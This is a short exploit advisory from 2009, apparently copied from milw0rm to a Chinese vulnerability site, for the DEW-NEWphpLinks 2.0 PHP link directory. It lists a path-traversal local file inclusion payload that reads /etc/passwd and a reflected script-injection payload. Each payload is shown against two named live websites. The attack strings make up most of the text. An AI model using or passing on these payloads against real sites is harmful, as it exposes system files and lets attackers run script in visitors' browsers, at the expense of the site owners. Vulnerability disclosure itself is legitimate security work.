[~]------------------------------------------------------------------------------------------------ [~] DEW-NEWphpLinks 2.0 (LFI/XSS) Multiple Remote Vulnerabilities [~] [~] http://www.dew-code.com [~] [~] [~] ----------------------------------------------------------------------------------------------- [~] Bug founded by d3v1l [Avram Marius] [~] [~] Date: 25.04.2009 [~] [~] [~] d3v1l@spoofer.com http://security-sh3ll.com [~] [~] ------------------------------------------------------------------------------------------------ [~] Greetz tO ALL:- [~] [~] Security-Shell Members(https://security-shell.ws/forum.php)-(http://security-sh3ll.blogspot.com) [~] [~] milw0rm staff [~]------------------------------------------------------------------------------------------------- [~] Exploit :- LFI - index.php?show= [~] [~] http://site.com/index.php?show=../../../../../../etc/passwd%00 [~] [~] Ex :- [~] [~] http://www.customprintedsweatshirts.com/links/index.php?show=../../../../../../etc/passwd%00 [~] http://directory.custom-printed-t-shirts.com/index.php?show=../../../../../../etc/passwd%00 [~]------------------------------------------------------------------------------------------------- [~] XSS on search module works fine on ALL version [~] [~] Ex :- XSS - index.php?PID= [~] [~] http://directory.custom-printed-t-shirts.com/index.php?PID="><script>alert("test")</script> [~] http://www.customprintedsweatshirts.com/links/index.php?PID="><script>alert("test")</script> [~]------------------------------------------------------------------------------------------------- # milw0rm.com [2009-04-27]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论